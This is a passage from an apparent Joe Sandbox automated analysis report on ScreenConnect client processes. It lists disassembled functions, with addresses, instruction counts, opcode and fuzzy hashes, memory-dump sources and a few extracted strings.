Opcode Fuzzy Hash: ef2c876afcbe3a8dbdd78eac480927b6d7a1045644c2653a3bbf2ff77709dd19
Instruction Fuzzy Hash: E5E0DF70D05188DFDB04DFB8EA9218CBFB0EB46205B2188DEC408E7212DA369F029B40

Function 01D9BC82 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65cf02b688151d05f839c58a5f01e7bfd18ad269aa460ccf21c1eed4a9b98263
Instruction ID: 924e52efd9eab51d8654c885b2cb088ab2b1d42e560ba37ab0442d2912a5caa9
Opcode Fuzzy Hash: 65cf02b688151d05f839c58a5f01e7bfd18ad269aa460ccf21c1eed4a9b98263
Instruction Fuzzy Hash: E6E08C758193508FC780EF38A989086BFF0EE15604B85886DD8C9C3A01F230AA4B8B92

Function 01D9AFE5 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 213fe16fa8e941420519bef2c4e8bd59eb60300ef1291c1c7c28cbd503809caf
Instruction ID: c8fb61829dab51149517c3c74417bb83971587478729c2f190d3bd4f966d1ef1
Opcode Fuzzy Hash: 213fe16fa8e941420519bef2c4e8bd59eb60300ef1291c1c7c28cbd503809caf
Instruction Fuzzy Hash: 2CE04F7050D3909FC3459F38A9141497FF0AE06600B4644AAD8C9C7251E630AD46C762

Function 01D9ED28 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 083cf9356eed5f727bd743abd9ea5774a550a7a8c5732bf7e93229ebf9b3651f
Instruction ID: 2a5f8f32220e5d2fb3281dbfbbdfeca9edddb8ab1e371918dab9aab9a927144a
Opcode Fuzzy Hash: 083cf9356eed5f727bd743abd9ea5774a550a7a8c5732bf7e93229ebf9b3651f
Instruction Fuzzy Hash: 6DE0863240474CDFCB01EF68D459499BBB4EE95200B01868AE4495B113FB30E995D751

Function 01D95410 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 494cc6ecbec157d1e61929edea6ee8ee55def82f768445550e6ab8600a566c23
Instruction ID: 2a85110a8f7a196ae72cb34b74bbd4b52516f26331ec697e7de2deee1342d496
Opcode Fuzzy Hash: 494cc6ecbec157d1e61929edea6ee8ee55def82f768445550e6ab8600a566c23
Instruction Fuzzy Hash: CCD05E3070020C8FEB69CAA9E54491137E8BB486413A100B7E6458B237CA30EC01C756

Function 01D95988 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a94610e17db38c4074732d0e342d1747e0b9bf4e3766e2b2decf8c11a8b9ddd
Instruction ID: d75d9f9ab81ac27109813fdf65b5b5104e447fc458b7184218f12d87144c3a36
Opcode Fuzzy Hash: 2a94610e17db38c4074732d0e342d1747e0b9bf4e3766e2b2decf8c11a8b9ddd
Instruction Fuzzy Hash: 47D01730A0114DEF9F04EFA8E95159DBBB9EB86205B5085ADD908E3200EE31AE00AB80

Function 01D9ED38 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfedcd81ce8cfc05c5c0ebbbb58d0dc47ecd277d402f0ff3ab37ecf6d87a026f
Instruction ID: c78f92486fa5919e5889e6525834cdf3cfba277b96a93a6021b9e4a37e55294a
Opcode Fuzzy Hash: cfedcd81ce8cfc05c5c0ebbbb58d0dc47ecd277d402f0ff3ab37ecf6d87a026f
Instruction Fuzzy Hash: 6BD0C932814B0DCACB00BBB8D4544A9B7B8EED5240F00CA5AE88E67121FF70E6D0D781

Function 01D9E660 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90914831e188827bec8fb6699bd0399d0e9162b9d4fb3fdc093ca0e1bd9b8edc
Instruction ID: e413b76829ce511345703c63ff0569b35dd3d5bbca212faf01176842e92940fb
Opcode Fuzzy Hash: 90914831e188827bec8fb6699bd0399d0e9162b9d4fb3fdc093ca0e1bd9b8edc
Instruction Fuzzy Hash: 3BB011302000008B8288CA08C880808F3A2ABE8308328C0AEA808CB20ACF33E803CA08

Analysis Process: ScreenConnect.WindowsClient.exePID: 2736, Parent PID: 1672COMMON

Execution Graph

Execution Coverage:	14.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	5
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFD34A85731 Relevance: 6.1, Strings: 4, Instructions: 1136COMMON

Download Yara Rule

Strings

XMw4, xrefs: 00007FFD34A85D0D
Ty4, xrefs: 00007FFD34A86A52
Sy4, xrefs: 00007FFD34A857FC
PMw4, xrefs: 00007FFD34A85CE1

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID: Ty4$PMw4$XMw4$Sy4
API String ID: 0-1328414004
Opcode ID: 0a8a5a6652a04a555d5dd3bfd27e630505d85d0cbd73fc526a332e85e0a0ce9e
Instruction ID: 449a632e845fb1a07ef83d929ea7534ce9e9c55413a62eccf0128e4bbf603417
Opcode Fuzzy Hash: 0a8a5a6652a04a555d5dd3bfd27e630505d85d0cbd73fc526a332e85e0a0ce9e
Instruction Fuzzy Hash: 13721871B0CA4B4BFBE99B2884B56B97BC1EF96348F644079D94DC72D2DD2CB8019381

Function 00007FFD34A85F86 Relevance: .8, Instructions: 824COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37c3fceb88bd41c071e2dffef696ddb34127000387b96ce5b621941f26f570e6
Instruction ID: a7328e1d7f3cd3ee42bad455b8df5d60b8c7937ef21c6647647fa06fbebdc59d
Opcode Fuzzy Hash: 37c3fceb88bd41c071e2dffef696ddb34127000387b96ce5b621941f26f570e6
Instruction Fuzzy Hash: 4252C770B0CA4A8FFBE8EB2884A56797BD1EF96304F64447DD14DC72A2DE2CB8419741

Function 00007FFD34A8DD9D Relevance: .7, Instructions: 718COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc5df6e1fd648b5a9e24a1d1a763ce17ea397aa436688f2556fe5ef12ea4ce07
Instruction ID: c8629b217c6d81afa1ae9d414a0f63687733e4b092bfd195945c68b73f774c89
Opcode Fuzzy Hash: fc5df6e1fd648b5a9e24a1d1a763ce17ea397aa436688f2556fe5ef12ea4ce07
Instruction Fuzzy Hash: 5952A470F0854A8BE798EB24C8A57ED3BA1EF56304F6001BDD14ED72D2DE3C69469B42

Function 00007FFD34A8BD34 Relevance: .7, Instructions: 654COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6bc901e3048d5416c9c709a98704a033427f0fab9848b4daa2497692ae0d8d2
Instruction ID: 8946e00cb76ba03e8d28ac0797b5b4372536ffaedf1217f6d2c137975a1bf229
Opcode Fuzzy Hash: d6bc901e3048d5416c9c709a98704a033427f0fab9848b4daa2497692ae0d8d2
Instruction Fuzzy Hash: 2D024632B1DE4A0FE7A8EA2C88A51757BD1FF95314B1441BED54EC7293ED28F8068781

Function 00007FFD34A8D1D4 Relevance: .6, Instructions: 603COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a63040cc4638bcb9c1662b26fde147188808f00dc95f1a2fdd8c968e62084b97
Instruction ID: 54e003ad32eb53bbd81e75763ec00b737abe99e8cc6eb8cb033d26bac2977246
Opcode Fuzzy Hash: a63040cc4638bcb9c1662b26fde147188808f00dc95f1a2fdd8c968e62084b97
Instruction Fuzzy Hash: FA12F772B1C9494FE798EB2C84A56A97BE1FF99304F20417EE54EC72D3DD28E8068741

Function 00007FFD34A85944 Relevance: .4, Instructions: 408COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53355231929dfd1edf07c873a4ee518550d3d7cba6f6f71aa5f7748028209f3d
Instruction ID: fa80c2995d3013a4fc10516c7a7839f9e3b726afa03f0d514a6fd46c83d47244
Opcode Fuzzy Hash: 53355231929dfd1edf07c873a4ee518550d3d7cba6f6f71aa5f7748028209f3d
Instruction Fuzzy Hash: F5D1C670B0894F4BFBE99B2844F46B97AD2EF96348F644439D54DC32D2DE2CB8069381

Function 00007FFD34A85D9C Relevance: .4, Instructions: 358COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dac4628179b93ead92a7eae23b34ef4c71f0b49a393d147a52323a76a0e35fe1
Instruction ID: e5df1e94d9bb86b3feeb26863f1b12c7010b2fb60969a39cdee2d9b1f390c049
Opcode Fuzzy Hash: dac4628179b93ead92a7eae23b34ef4c71f0b49a393d147a52323a76a0e35fe1
Instruction Fuzzy Hash: F4C1C670B18E4F8AF7E9972444B46B97AD2EF96348F644479D14DC32D2DE2CB8069381

Function 00007FFD34A8022D Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a821e445a643fcec984237fd933e4fa0a96282f5f64a3c0c50d0ea0c094f65c
Instruction ID: feaff8edd85bb543f54e24dced1062baf4c8cd0d95a0c4dd1494a9e2ab1a4024
Opcode Fuzzy Hash: 5a821e445a643fcec984237fd933e4fa0a96282f5f64a3c0c50d0ea0c094f65c
Instruction Fuzzy Hash: 1FA1C757B0D7D25BE7A2962C58F64E93FD0EF5322C71A00B7C688CE093ED0D684BA251

Function 00007FFD34A82291 Relevance: 5.2, Strings: 4, Instructions: 181
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Pg4, xrefs: 00007FFD34A82388
Xg4, xrefs: 00007FFD34A8231E
Hg4, xrefs: 00007FFD34A822EA
Mw4, xrefs: 00007FFD34A82357

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID: Mw4$Hg4$Pg4$Xg4
API String ID: 0-1620713507
Opcode ID: bbb2906fbe9c378863f486ce0a0480ed0ae6af762dadb9d0f54cbff16048f4cd
Instruction ID: 447cd4c0f2edc015ff5d03fceae7f408b029300d3fbc18a32195c9381b4fda54
Opcode Fuzzy Hash: bbb2906fbe9c378863f486ce0a0480ed0ae6af762dadb9d0f54cbff16048f4cd
Instruction Fuzzy Hash: 5C51B372B0DA454FEBD8DE18D4A06B43BD1FF95318F1401BAD44DDB282DA29F8428741

Function 00007FFD34A84E89 Relevance: 2.6, Strings: 2, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

g4, xrefs: 00007FFD34A84F34
g4, xrefs: 00007FFD34A84FBB

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID: g4$g4
API String ID: 0-2050786409
Opcode ID: 5276616b44efd6c867c313e8c963444df97e58b96602435ba3ef1e394bb41e2e
Instruction ID: 1e769809691d4e5898d95756daa3472be67a714d0e7d1ba0774e374cd4134529
Opcode Fuzzy Hash: 5276616b44efd6c867c313e8c963444df97e58b96602435ba3ef1e394bb41e2e
Instruction Fuzzy Hash: 8A419471708A894FDBC4DF28C8A4AA53B91FF59318B2445AED56EC72D2DB35EC12CB01

Function 00007FFD34778014 Relevance: 1.7, APIs: 1, Instructions: 174
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD34778142

Memory Dump Source

Source File: 00000009.00000002.2439040245.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34770000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 5940d4ed6f6e0f4ba044b5562d74f3028c715459a10cbbe331511ec627923b82
Instruction ID: fec5a041fc3833dd2de1e207b173b873dcf57996a8e5dbe0dc3707bfcb46e14f
Opcode Fuzzy Hash: 5940d4ed6f6e0f4ba044b5562d74f3028c715459a10cbbe331511ec627923b82
Instruction Fuzzy Hash: B4412971A0CB498FD715AFA89C4A5F9BBE0EF56310F04417EE449C3192DE68B846CBD1

Function 00007FFD34A84875 Relevance: 1.6, Strings: 1, Instructions: 383
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

P'x4, xrefs: 00007FFD34A84908

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID: P'x4
API String ID: 0-286885776
Opcode ID: 1ee3b16268eddcf90f81d440f89bd94be51dcec7e0e3ff0d4e556d6ba589d799
Instruction ID: d68752b324c6165ec28f0cde292cb990a7869da5c84ab4da40e0e545c7c1c7ef
Opcode Fuzzy Hash: 1ee3b16268eddcf90f81d440f89bd94be51dcec7e0e3ff0d4e556d6ba589d799
Instruction Fuzzy Hash: D0B12E32B0C94A4BEBA4EB1888A25F57BD1EF66318B6401BED54DC7183FD1CF9068781

Function 00007FFD34A80A40 Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

4, xrefs: 00007FFD34A80AE0

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 4755125305a34eb81a799899f8b4033479e0979374961a3df093f2c809742c1d
Instruction ID: d6827b7f4dcab1eea9eedec0d0ec2e5c3cdd7a33fc4863a77bb62d9569020335
Opcode Fuzzy Hash: 4755125305a34eb81a799899f8b4033479e0979374961a3df093f2c809742c1d
Instruction Fuzzy Hash: 4731282BB0D6925BD711B7ACF4A74EE7F94DF4332DB0800B7D28CDA053DD19205A9291

Function 00007FFD34A89CCC Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

Lw4, xrefs: 00007FFD34A89DB3

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID: Lw4
API String ID: 0-320171606
Opcode ID: 184b00794ff452c8fa1903862426cea789ecf7109e17b5f91bc48c86b2322f6b
Instruction ID: 2543ea3a663a876dc16e1958e57d9b48b96008a667133fc376c7d3ca3974f2bf
Opcode Fuzzy Hash: 184b00794ff452c8fa1903862426cea789ecf7109e17b5f91bc48c86b2322f6b
Instruction Fuzzy Hash: CE31E772B0DD894FEFC9DB2888606683BD1FF9A308B1440A9E55DD72D3DE28E8018B45

Function 00007FFD34A87145 Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

`jy4, xrefs: 00007FFD34A871F2

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID: `jy4
API String ID: 0-2154516707
Opcode ID: 2fe2ed4f73cb705c94c4458c4b69288b4501ea8e4074c8268cf85be58cd5e26b
Instruction ID: dd170106f3ee5c20fb1741078ad8afc7b34b3f3e99f0136c038a2b979d5328f9
Opcode Fuzzy Hash: 2fe2ed4f73cb705c94c4458c4b69288b4501ea8e4074c8268cf85be58cd5e26b
Instruction Fuzzy Hash: A521E025B0E9664FE7E9972848B02757AD6EF87309F6440B6D14EC76E2CD0CA806A350

Function 00007FFD34A8A5D7 Relevance: .7, Instructions: 663COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32ae88c3b3b8120da27b5b4b75ac8ac8c6323339900f89a174a948ed20cd905b
Instruction ID: 5cd2fa03377a62f005711a20a86d04d53a5cd513cf9d12cf8879bc7daf296d97
Opcode Fuzzy Hash: 32ae88c3b3b8120da27b5b4b75ac8ac8c6323339900f89a174a948ed20cd905b
Instruction Fuzzy Hash: C3122A71B0DE4A4FEB989B6888A56B87BD1EF55304F1440BED50EC71D3DE28AC46D780

Function 00007FFD34A8E4D8 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4174e3aa78a5b6648c655c0f8c51165dcf30289528df4a4bfc5d57e365de3e78
Instruction ID: 635eb3f51755399171f0937d7d8aaacd7b80ffbba82ec6445c0231f3ef99d367
Opcode Fuzzy Hash: 4174e3aa78a5b6648c655c0f8c51165dcf30289528df4a4bfc5d57e365de3e78
Instruction Fuzzy Hash: 95A1B230B5851A8BEB98EB58C8B67FD7AA1FF65300F50417CD14ED32C2DE2C69468B91

Function 00007FFD34A84993 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66ba039047281b9e72069398eb10a2ef1d0742f59d30fc19ae3c356d1a9acd70
Instruction ID: 069114c61b88942b24ea48a81ed39baba43802e7578ef66f21291f8ea9a9b4e6
Opcode Fuzzy Hash: 66ba039047281b9e72069398eb10a2ef1d0742f59d30fc19ae3c356d1a9acd70
Instruction Fuzzy Hash: EB71E932A0CD0A4BDFA8EB14C8A29F577D1FF65304BA0417DD55EC7582EE28F90A8781

Function 00007FFD34A8B7D5 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b721ee96e20dd070d41efa763437746b8cde119139476a5cdc9b530ab4f5f60
Instruction ID: 9e5cd7042ce2ba00041b23810c56493dcb2231ffab6d6f642e160adb6dcd7655
Opcode Fuzzy Hash: 6b721ee96e20dd070d41efa763437746b8cde119139476a5cdc9b530ab4f5f60
Instruction Fuzzy Hash: 2D818971708A4D8FDFD4DF18C8A4AA93BE1FF59318B240669E45DD7292CB39E842CB41

Function 00007FFD34A87DCD Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 852fdb6e9a44d9b1c9d3c64c21d8736677d61c2301455b6285781324d428480b
Instruction ID: e8195f8207e1f72f99d1a879a6acb87c20928ed49c510dcddb3c7a151c1081fd
Opcode Fuzzy Hash: 852fdb6e9a44d9b1c9d3c64c21d8736677d61c2301455b6285781324d428480b
Instruction Fuzzy Hash: 87614A37B0DD594BEBA19A695CA11E9BFD1EF96309F14017AD15CC3193DE28AC02C741

Function 00007FFD34A8D202 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 280db8d8546bb19e57a22b0d3db8f950a8b7aa7af4988bc5ce513e9f972bc038
Instruction ID: 1a9936b5006608076144182fab1bfdad8e417a0de69a0ffd28542e119ea36313
Opcode Fuzzy Hash: 280db8d8546bb19e57a22b0d3db8f950a8b7aa7af4988bc5ce513e9f972bc038
Instruction Fuzzy Hash: 6961A3717089454FE798EB2C84A5BA97BE1FF9A314F14407EE14EC72E3DE28A8069741

Function 00007FFD34A8ACB7 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cb6e10883f5e83e8567c9342a5d241e553df2f25e433260e9f304a8088077d7
Instruction ID: 304a5c4ad2cc3273cd892d1989db9b07878bcda72476dfde10a091bc7e621ff8
Opcode Fuzzy Hash: 8cb6e10883f5e83e8567c9342a5d241e553df2f25e433260e9f304a8088077d7
Instruction Fuzzy Hash: 83515761B1DE964FEB96A72C58A95787BD1EF9A314B5801BAD04DC32D3DD1CBC028382

Function 00007FFD34A839F2 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 776ed3cebb93700773b959274bc035e5f925c625de82b26225419a29951d765d
Instruction ID: 094f3509d8439b12b282dd2c84d5607b4eeea13b6c1bbc85c3744980a32f2971
Opcode Fuzzy Hash: 776ed3cebb93700773b959274bc035e5f925c625de82b26225419a29951d765d
Instruction Fuzzy Hash: 03510634709A068FDBDCEF18C0A46A577E1FF99308B3449A9C15DCB686CA25E843D740

Function 00007FFD34A89E21 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 179c88b2559b6daf809156e5667db0fbbcc9ea43b8733a4e62599fed5820f36b
Instruction ID: 3bd43ef18e121aa2bbeca839f9059bf2afa44054552e3fb8ffbc063896cfb7f9
Opcode Fuzzy Hash: 179c88b2559b6daf809156e5667db0fbbcc9ea43b8733a4e62599fed5820f36b
Instruction Fuzzy Hash: 6241D73170CA464FE794EB2884A97BA7BD9EF9A304F25457AD04EC32D3CD2CAC419741

Function 00007FFD34A8BAC5 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a9e589ed8f0a0bd04183209cf74a35106d3060f8b8dd2d58b9883ce89e82c2a
Instruction ID: 88b6e03a355da3458be2c892f55534ee3ff1fa24e0264e46f58b764d0f8270af
Opcode Fuzzy Hash: 6a9e589ed8f0a0bd04183209cf74a35106d3060f8b8dd2d58b9883ce89e82c2a
Instruction Fuzzy Hash: 8841557161DA894FDBD4DF18C8B49653BE1FF99308B140199E46DC72D6CB39E812CB01

Function 00007FFD34A8DBFA Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc1abea3f415ba39000257ab4baf953b37097e53e990db0cacf65ad55f49f769
Instruction ID: 8e5e96e50566ff523a18de2e1d69086fbfa769218d78bdb1bbb8ee46ff26044c
Opcode Fuzzy Hash: dc1abea3f415ba39000257ab4baf953b37097e53e990db0cacf65ad55f49f769
Instruction Fuzzy Hash: C541BBA3A097965FE751B7ACA4F70EA3BA4DF5322CB0801B7D1C8CA093ED1964564681

Function 00007FFD34A8EE34 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d60f3c8e30a2959fd194407340b4c2188d5f46187e169c6ea08031a28fb7cd5a
